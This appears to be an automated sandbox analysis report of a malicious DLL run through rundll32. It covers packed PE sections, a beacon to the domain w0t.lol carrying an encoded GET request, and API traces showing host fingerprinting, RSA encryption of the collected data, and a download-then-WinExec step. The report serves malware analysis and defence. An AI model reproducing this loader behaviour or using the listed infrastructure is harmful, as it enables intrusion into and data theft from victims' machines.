.rdata | 0xf000 | 0x837 | 0x1000 | 3936868e1249266d25c6c43831ecaa9c | False | 0.298583984375 | data | 2.7036873961689896 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x10000 | 0x24200 | 0x24000 | 728fa214bf78861ed2be0464e5b2e851 | False | 0.2669542100694444 | data | 6.204494425770218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
z4g | 0x35000 | 0x7a4cf | 0x7b000 | 398319310efec22a8e1707da92eb10be | False | 0.9946666190294715 | data | 7.995421677975023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qm | 0xb0000 | 0x70e8f | 0x71000 | fa2c61d59fecbab30f271e9278c4e647 | False | 0.9991314643252213 | data | 7.99943170498821 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
L | 0x121000 | 0xe7504 | 0xe8000 | d17b37313f02147b68341a0bca06f4bf | False | 0.9966262291217672 | data | 7.997710795649098 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
CONST | 0x209000 | 0xd88 | 0x1000 | b052a42265a0ef04c82877e017c33121 | False | 0.7548828125 | data | 7.057514057791508 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
3 | 0x20a000 | 0x13a0 | 0x2000 | 6c371933aac1ef87a68049c0aca61de8 | False | 0.5489501953125 | data | 5.6043812950914065 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
buicKDZl | 0x20c000 | 0xf0e | 0x1000 | ecb3c30a4d5685f7394de862efbb63cd | False | 0.756591796875 | data | 6.855147821668895 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
CRT | 0x20d000 | 0x1920 | 0x2000 | f44e399cc7eb92f94e27ac6c5b5c2312 | False | 0.7213134765625 | data | 6.598433129737103 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x20f000 | 0x6d28 | 0x7000 | 85992fe593ac7adce6fc2d273bfa339c | False | 0.30946568080357145 | data | 5.688832279317778 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x216000 | 0xada8 | 0xb000 | 96222f6edd2ec89fd0af45e507598034 | False | 0.1380282315340909 | data | 5.6863785572940495 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x20f310 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Russian | Russia | 0.5469043151969981
RT_ICON | 0x2103b8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Russian | Russia | 0.600177304964539
RT_ICON | 0x210820 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Russian | Russia | 0.5107879924953096
RT_ICON | 0x2118c8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Russian | Russia | 0.648936170212766
RT_ICON | 0x211d30 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Russian | Russia | 0.5668386491557224
RT_ICON | 0x212dd8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Russian | Russia | 0.6551418439716312
RT_ICON | 0x213240 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Russian | Russia | 0.5905253283302064
RT_ICON | 0x2142e8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Russian | Russia | 0.6826241134751773
RT_ICON | 0x214750 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Russian | Russia | 0.5466697936210131
RT_ICON | 0x2157f8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Russian | Russia | 0.6445035460992907
RT_GROUP_ICON | 0x215c60 | 0x22 | data | Russian | Russia | 1.0588235294117647
RT_GROUP_ICON | 0x215c88 | 0x22 | data | Russian | Russia | 1.0588235294117647
RT_GROUP_ICON | 0x215cb0 | 0x22 | data | Russian | Russia | 1.0588235294117647
RT_GROUP_ICON | 0x215cd8 | 0x22 | data | Russian | Russia | 1.0588235294117647
RT_GROUP_ICON | 0x215d00 | 0x22 | data | Russian | Russia | 1.0588235294117647
DLL | Import
OLEAUT32.dll | VarBoolFromR4
KERNEL32.dll | GetSystemTimeAsFileTime, GetStdHandle, SuspendThread, LoadLibraryExW, OutputDebugStringA, GetModuleFileNameW, GetBinaryTypeW
GDI32.dll | BitBlt

Language of compilation system | Country where language is spoken
Russian | Russia
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Oct 1, 2024 15:13:41.206187963 CEST | 49768 | 443 | 192.168.11.20 | 104.21.69.9
                  Oct 1, 2024 15:13:41.206321955 CEST | 443 | 49768 | 104.21.69.9 | 192.168.11.20
                  Oct 1, 2024 15:13:41.206552029 CEST | 49768 | 443 | 192.168.11.20 | 104.21.69.9
                  Oct 1, 2024 15:13:41.233659029 CEST | 49768 | 443 | 192.168.11.20 | 104.21.69.9
                  Oct 1, 2024 15:13:41.233724117 CEST | 443 | 49768 | 104.21.69.9 | 192.168.11.20
                  Oct 1, 2024 15:13:41.538127899 CEST | 443 | 49768 | 104.21.69.9 | 192.168.11.20
                  Oct 1, 2024 15:13:41.538325071 CEST | 49768 | 443 | 192.168.11.20 | 104.21.69.9
                  Oct 1, 2024 15:13:41.538325071 CEST | 49768 | 443 | 192.168.11.20 | 104.21.69.9
                  Oct 1, 2024 15:13:41.569322109 CEST | 49768 | 443 | 192.168.11.20 | 104.21.69.9
                  Oct 1, 2024 15:13:41.569375992 CEST | 443 | 49768 | 104.21.69.9 | 192.168.11.20
                  Oct 1, 2024 15:13:41.569978952 CEST | 443 | 49768 | 104.21.69.9 | 192.168.11.20
                  Oct 1, 2024 15:13:41.570198059 CEST | 49768 | 443 | 192.168.11.20 | 104.21.69.9
                  Oct 1, 2024 15:13:41.572062016 CEST | 49768 | 443 | 192.168.11.20 | 104.21.69.9
                  Oct 1, 2024 15:13:41.616287947 CEST | 443 | 49768 | 104.21.69.9 | 192.168.11.20
                  Oct 1, 2024 15:14:22.473273993 CEST | 443 | 49768 | 104.21.69.9 | 192.168.11.20
                  Oct 1, 2024 15:14:22.473858118 CEST | 443 | 49768 | 104.21.69.9 | 192.168.11.20
                  Oct 1, 2024 15:14:22.473865986 CEST | 49768 | 443 | 192.168.11.20 | 104.21.69.9
                  Oct 1, 2024 15:14:22.474410057 CEST | 49768 | 443 | 192.168.11.20 | 104.21.69.9
                  Oct 1, 2024 15:14:22.475591898 CEST | 49768 | 443 | 192.168.11.20 | 104.21.69.9
                  Oct 1, 2024 15:14:22.475593090 CEST | 49768 | 443 | 192.168.11.20 | 104.21.69.9
                  Oct 1, 2024 15:14:22.475667000 CEST | 443 | 49768 | 104.21.69.9 | 192.168.11.20
                  Oct 1, 2024 15:14:22.475821018 CEST | 49768 | 443 | 192.168.11.20 | 104.21.69.9
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Oct 1, 2024 15:13:41.063515902 CEST | 53051 | 53 | 192.168.11.20 | 1.1.1.1
                  Oct 1, 2024 15:13:41.200373888 CEST | 53 | 53051 | 1.1.1.1 | 192.168.11.20
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Oct 1, 2024 15:13:41.063515902 CEST | 192.168.11.20 | 1.1.1.1 | 0x9f81 | Standard query (0) | w0t.lol | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Oct 1, 2024 15:13:41.200373888 CEST | 1.1.1.1 | 192.168.11.20 | 0x9f81 | No error (0) | w0t.lol | | 104.21.69.9 | A (IP address) | IN (0x0001) | false
                  Oct 1, 2024 15:13:41.200373888 CEST | 1.1.1.1 | 192.168.11.20 | 0x9f81 | No error (0) | w0t.lol | | 172.67.202.143 | A (IP address) | IN (0x0001) | false
                  • w0t.lol
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.11.20 | 49768 | 104.21.69.9 | 443 | 856 | C:\Windows\SysWOW64\rundll32.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2024-10-01 13:13:41 UTC | 714 | OUT | GET /S2wueuBWcKItxJBxaKQWGAqL7hMS3sfSm3IIJcJI-UnDuhqZF3FZYmhcdfYjgTH9ls8toERqLL6uvqWxks5TXG7p4KTZE3NtE0QUExXonRRsVxuWAUUUBfY4OBn0j6WOD9WysDP09mb9Mw2zw25E4216qfUiBb1_-f0hXmBwm-5V3zs05mClVySIs4Q2owQXkeB3urgLrouGFuJF9ZudjP54bzXceldzNx2o8pCLFM6WK1vNqyQJ4ZGEs5wabg119exWDBy_U0fDfIKkmquk4nx095rTVG61p-61BBPfkxzOTkQYmZHX6uOiApQ41hZ0OE5yH5VhrRws_4Dk7blD-zRqQGci0UruB3OYd7fIEanuxbGDB6PoPMh8nJxhyUjELjSu3EwICQdnYkBbiVs2LkVCWKmmn2lIaQTzB-OoNpw-dg1CW7D5qiS6SoaepRg HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                  Host: w0t.lol
                  Connection: Keep-Alive
                  2024-10-01 13:14:22 UTC | 306 | IN | HTTP/1.1 404 Not Found
                  Date: Tue, 01 Oct 2024 13:14:22 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Cache-Control: no-cache, no-store, must-revalidate
                  CF-Cache-Status: DYNAMIC
                  Speculation-Rules: "/cdn-cgi/speculation"
                  Server: cloudflare
                  CF-RAY: 8cbcb62419383343-MIA
                  2024-10-01 13:14:22 UTC | 555 | IN | Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                  Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                  2024-10-01 13:14:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0

                  Target ID:0
                  Start time:09:12:45
                  Start date:01/10/2024
                  Path:C:\Windows\System32\loaddll32.exe
                  Wow64 process (32bit):true
                  Commandline:loaddll32.exe "C:\Users\user\Desktop\e.dll"
                  Imagebase:0xd10000
                  File size:126'464 bytes
                  MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:1
                  Start time:09:12:45
                  Start date:01/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7e9d70000
                  File size:875'008 bytes
                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:2
                  Start time:09:12:45
                  Start date:01/10/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\e.dll",#1
                  Imagebase:0xef0000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:3
                  Start time:09:12:45
                  Start date:01/10/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\e.dll",#1
                  Imagebase:0x7f0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                    Execution Graph

                    Execution Coverage:7%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:20%
                    Total number of Nodes:15
                    Total number of Limit Nodes:1
                    execution_graph: rendered graph (node and edge dump omitted). Executed path: 401450 -> 401210 -> 40bac0 (GetBinaryTypeW) -> 40c8c0 -> 40c340 -> 40bb70 (GetPEB).

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
                    callgraph: rendered call graph of the loaddll32 image (functions at 0x00401000-0x0040D730 and 0x00609227-0x0060D1F4, plus Function_00570E37 and Function_005211B3); node and edge dump omitted.

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph: rendered graph for function 40bac0 (calls GetBinaryTypeW); basic-block and edge dump omitted.
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.89094717953.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.89094687410.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89094717953.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89094776577.000000000040F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89094805713.0000000000410000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89094855256.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89094883864.0000000000435000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89095257309.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                    Similarity
                    • API ID: BinaryType
                    • String ID:
                    • API String ID: 3726996659-0
                    • Opcode ID: f08c01220cdb92308e6675d8711dd31eef13735afd4c0da1eb9ca56311e6b591
                    • Instruction ID: f04447051f637acae275e0fc76e63c99c49ac1912a4e59a5da11b41603d828b7
                    • Opcode Fuzzy Hash: f08c01220cdb92308e6675d8711dd31eef13735afd4c0da1eb9ca56311e6b591
                    • Instruction Fuzzy Hash: E81121B094021C8BDB20DF64E9483ECBBB0FB10304F1041AAD409A76C4D3755AC9CFDA
                    Memory Dump Source
                    • Source File: 00000000.00000002.89094717953.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.89094687410.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89094717953.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89094776577.000000000040F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89094805713.0000000000410000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89094855256.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89094883864.0000000000435000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89095257309.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2dbdcf60662948e2ff885b22cd55f1fd29c6a08333cf398e80a49c496a15d30f
                    • Instruction ID: 934b070544ea70db5ffccdbbb63979c1f88a9cc566a2ff2b6c6b34971c7bcd6a
                    • Opcode Fuzzy Hash: 2dbdcf60662948e2ff885b22cd55f1fd29c6a08333cf398e80a49c496a15d30f
                    • Instruction Fuzzy Hash: 5551D874A04215DFDB04CF98C4D4ABDB7B1FB88304F60856AD812EB3E0D739A991DB5A
                    Memory Dump Source
                    • Source File: 00000000.00000002.89094717953.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.89094687410.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89094717953.000000000040B000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89094776577.000000000040F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89094805713.0000000000410000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89094855256.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89094883864.0000000000435000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.89095257309.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 72ccadd71a06bf1081c8144345e47d34f7834f5881eba21348e0591e335b0186
                    • Instruction ID: c9c4745f8ce940bcd58fb37baa10aaa24998e04b54fc61a643b04cc763f264f7
                    • Opcode Fuzzy Hash: 72ccadd71a06bf1081c8144345e47d34f7834f5881eba21348e0591e335b0186
                    • Instruction Fuzzy Hash: 5EF012B19043199FD710CF59E94046ABBF4FB49321B50C43EE898D7340D770A944CF65

                    Execution Graph

                    Execution Coverage:28.4%
                    Dynamic/Decrypted Code Coverage:99%
                    Signature Coverage:78.1%
                    Total number of Nodes:105
                    Total number of Limit Nodes:8
                    execution_graph: rendered graph for the rundll32 process (node and edge dump omitted). API nodes on the executed paths: VirtualProtect, VirtualAlloc, VirtualFree, VirtualAllocExNuma, NtCreateThreadEx, CreateThread, CreateEventA, WaitForSingleObject, TerminateProcess, GetPEB, LoadLibraryA, LdrGetProcedureAddress; and in the 27ac1120 chain: GetPEB, GetTickCount, SHGetValueA, SHSetValueA, UuidCreateSequential, sprintf, RtlComputeCrc32, GlobalAlloc, GlobalFree, GetModuleFileNameA, GetCommandLineA, memset, memcpy, CryptBinaryToStringA, EnumDisplaySettingsA, CryptAcquireContextA, CryptDecodeObjectEx, CryptImportPublicKeyInfo, CryptEncrypt, URLDownloadToCacheFileA, lstrlen, _lopen, _hread, _lclose, WinExec. Entry: 27ac18f6 CreateThread -> 27ac18cb CreateEventA / WaitForSingleObject -> 27ac1120 -> 27ac18a5 TerminateProcess.

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph: rendered graph for function 27ac1120 (blocks 27ac1120-27ac18ca; calls 27ac1911 and 27ac1923); basic-block and edge dump omitted, the APIs reached are listed under APIs below.
                    APIs
                    • GetTickCount.KERNEL32 ref: 27AC116C
                    • SHGetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,?,?), ref: 27AC11B9
                    • SHSetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,00000001,?), ref: 27AC11E0
                    • UuidCreateSequential.RPCRT4(?), ref: 27AC11F5
                    • sprintf.NTDLL ref: 27AC122C
                    • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC124F
                    • GlobalAlloc.KERNEL32(00000040,00001000,00000000,?,00000000), ref: 27AC1266
                    • sprintf.NTDLL ref: 27AC128C
                    • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC12CB
                    • sprintf.NTDLL ref: 27AC13CA
                    • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC1401
                    • sprintf.NTDLL ref: 27AC1434
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 27AC144A
                    • sprintf.NTDLL ref: 27AC145F
                    • GetCommandLineA.KERNEL32 ref: 27AC1467
                    • sprintf.NTDLL ref: 27AC1475
                    • memset.NTDLL ref: 27AC1482
                    • CryptBinaryToStringA.CRYPT32(?,00000030,4000000C,?,?,?,?,?,00000000,00000030,00000000), ref: 27AC14F3
                    • sprintf.NTDLL ref: 27AC150C
                    • memset.NTDLL ref: 27AC155E
                    • EnumDisplaySettingsA.USER32(?,000000FF,?), ref: 27AC1578
                    • sprintf.NTDLL ref: 27AC15AE
                    • memcpy.NTDLL(0000000C,00000000,?), ref: 27AC165B
                    • memcpy.NTDLL(00000080,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000030,00000000), ref: 27AC167D
                    • memset.NTDLL ref: 27AC16BF
                    • GlobalFree.KERNEL32(00000000), ref: 27AC16C8
                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,?,00000000,?,00000000), ref: 27AC1703
                    • CryptDecodeObjectEx.CRYPT32(00010001,00000008,27AC1000,000000A2,00008000,00000000,?,00000000), ref: 27AC1738
                    • CryptImportPublicKeyInfo.CRYPT32(?,00000001,?,?), ref: 27AC1755
                    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,00000080), ref: 27AC1774
                    • CryptBinaryToStringA.CRYPT32(00000000,?,40000001,?,00000000), ref: 27AC17D6
                    • memset.NTDLL ref: 27AC17E3
                    • GlobalFree.KERNEL32(00000000), ref: 27AC17EC
                    • URLDownloadToCacheFileA.URLMON(00000000,00000000,?,00000105,00000000,00000000), ref: 27AC183B
                    • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000105,00000000,00000000,?,?,?,?,?,?,00000000,?,00000000), ref: 27AC1843
                    • memset.NTDLL ref: 27AC184C
                    • GlobalFree.KERNEL32(00000000), ref: 27AC1855
                    • _lopen.KERNEL32(?,00000000), ref: 27AC1868
                    • _hread.KERNEL32(00000000,?,00000002), ref: 27AC187D
                    • _lclose.KERNEL32(00000000), ref: 27AC1884
                    • WinExec.KERNEL32(?,00000000), ref: 27AC189F
                    • GlobalFree.KERNEL32(00000000), ref: 27AC18B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.84975565291.0000000027AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 27AC1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_27ac1000_rundll32.jbxd
                    Similarity
                    • API ID: sprintf$Crypt$Globalmemset$Free$ComputeCrc32$BinaryFileStringValuememcpy$AcquireAllocCacheCommandContextCountCreateDecodeDisplayDownloadEncryptEnumExecImportInfoLineModuleNameObjectPublicSequentialSettingsTickUuid_hread_lclose_lopenlstrlen
                    • String ID: %02x%02x%02x%02x%02x%02x$%08x%08x*%s*%u$*%s$*%s_%s_%u_%u_%u$0$COMPUTERNAME$SOFTWARE\Microsoft\Mediaplayer$USERNAME$lol/$s://$w0t.$wnp^$?kL
                    • API String ID: 3929119689-2541717829
                    • Opcode ID: cbe10f6ba930fff9b99e63469f94eef1096c7ab02c519e9caa091d67d897b52f
                    • Instruction ID: d1afb5b641d7297c3d98dbba34a3546c4b9938a4bc15ba799c89e36e1a3fbf9a
                    • Opcode Fuzzy Hash: cbe10f6ba930fff9b99e63469f94eef1096c7ab02c519e9caa091d67d897b52f
                    • Instruction Fuzzy Hash: 351291B1A08345BFE720DF64CD84FAB7BECBB94361F10492EF695D2141DA3899448B63

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph: rendered graph for function 51b22a0 (blocks 51b22a0-51b6b9e; calls 51b1450, 51b2084, 51b71d2 and 51ba660); basic-block and edge dump omitted.
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974409517.00000000051B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 051B1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_51b1000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: 5`oj$5`oj
                    • API String ID: 0-1924437217
                    • Opcode ID: 02acf7ec11d640ac9f3017bec193d97360015263b7909136a701dde5258c969b
                    • Instruction ID: 60fce56bd8fc4d7551f33c4ba5fdad6d29dcb9b92d4f09529c7161823ec92507
                    • Opcode Fuzzy Hash: 02acf7ec11d640ac9f3017bec193d97360015263b7909136a701dde5258c969b
                    • Instruction Fuzzy Hash: 5093F77BB546114BD72CCE6DCCD12E9A6C76BCC314F1ED63E884ADB398DDB898064680

                    Control-flow Graph

                    • Executed / Not Executed colouring (not recoverable from the extracted text)
                    control_flow_graph (figure residue; only the block address range, callees and API labels are recoverable): basic blocks 3290005-329038e; calls 3290391 (x4); API labels VirtualAlloc, LoadLibraryA, LdrGetProcedureAddress, VirtualProtect
                    APIs
                    • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 032900A0
                    • LoadLibraryA.KERNEL32(?), ref: 0329020D
                    • LdrGetProcedureAddress.NTDLL(00000000,?,00000000,?), ref: 0329025A
                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 0329035F
                    Memory Dump Source
                    • Source File: 00000003.00000002.84973393718.0000000003290000.00000020.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3290000_rundll32.jbxd
                    Similarity
                    • API ID: Virtual$AddressAllocLibraryLoadProcedureProtect
                    • String ID:
                    • API String ID: 3829562780-0
                    • Opcode ID: 3c0398302410d883315648ee21e8cbdebfa52049138ef01b04af12db65d8c14a
                    • Instruction ID: 8b707dcaff33af6dc29dddc6552701ab47bdd32c94d5515fd41254078bcb9937
                    • Opcode Fuzzy Hash: 3c0398302410d883315648ee21e8cbdebfa52049138ef01b04af12db65d8c14a
                    • Instruction Fuzzy Hash: 30B1AE75A2430A9BEF18CF19C89077AB7E9BF88704F58846EE942CB241E774E8C1C755
                    APIs
                    • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06831321
                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 06831627
                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 068316ED
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180388238.0000000006831000.00000020.00001000.00020000.00000000.sdmp, Offset: 06831000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6831000_rundll32.jbxd
                    Similarity
                    • API ID: Virtual$Protect$Alloc
                    • String ID:
                    • API String ID: 2541858876-0
                    • Opcode ID: cf9569ba81d9787a9a6e9d53b9afc1cb5ac2ad74d405ff41cf0717cb2915b627
                    • Instruction ID: 5d6fda225d8032c76188662a1bd5a94ed341b24036d482ac1c580fe081cc5200
                    • Opcode Fuzzy Hash: cf9569ba81d9787a9a6e9d53b9afc1cb5ac2ad74d405ff41cf0717cb2915b627
                    • Instruction Fuzzy Hash: AD228E76E001298FDB58CF29CC456EDB7B6BF89314F29C199D449AB344DB70AD828F80
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: R4Vd
                    • API String ID: 0-3306949354
                    • Opcode ID: 9ec2c6bc56d9088785db9a1a2637afaca2e458cd132236148dfec7a9104e842f
                    • Instruction ID: e5225560412135300e374e1ffd17268fa6eb6bf29d9a50f6e025a92f8e1a6e29
                    • Opcode Fuzzy Hash: 9ec2c6bc56d9088785db9a1a2637afaca2e458cd132236148dfec7a9104e842f
                    • Instruction Fuzzy Hash: D273C3726097818FD774DF28C980BABB7E6BFC9310F158A1DD499DB694DB30A801CB52
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: !$MSR$ecf
                    • API String ID: 0-784032842
                    • Opcode ID: 224643889a938e8c6bda6f687b6b7ef9da2da3e5ab05ad7be0ff68abec53681e
                    • Instruction ID: 74cc4681f75dfcfdafd9766df308c2390e88df9593f41fad42d2d4f93861e10f
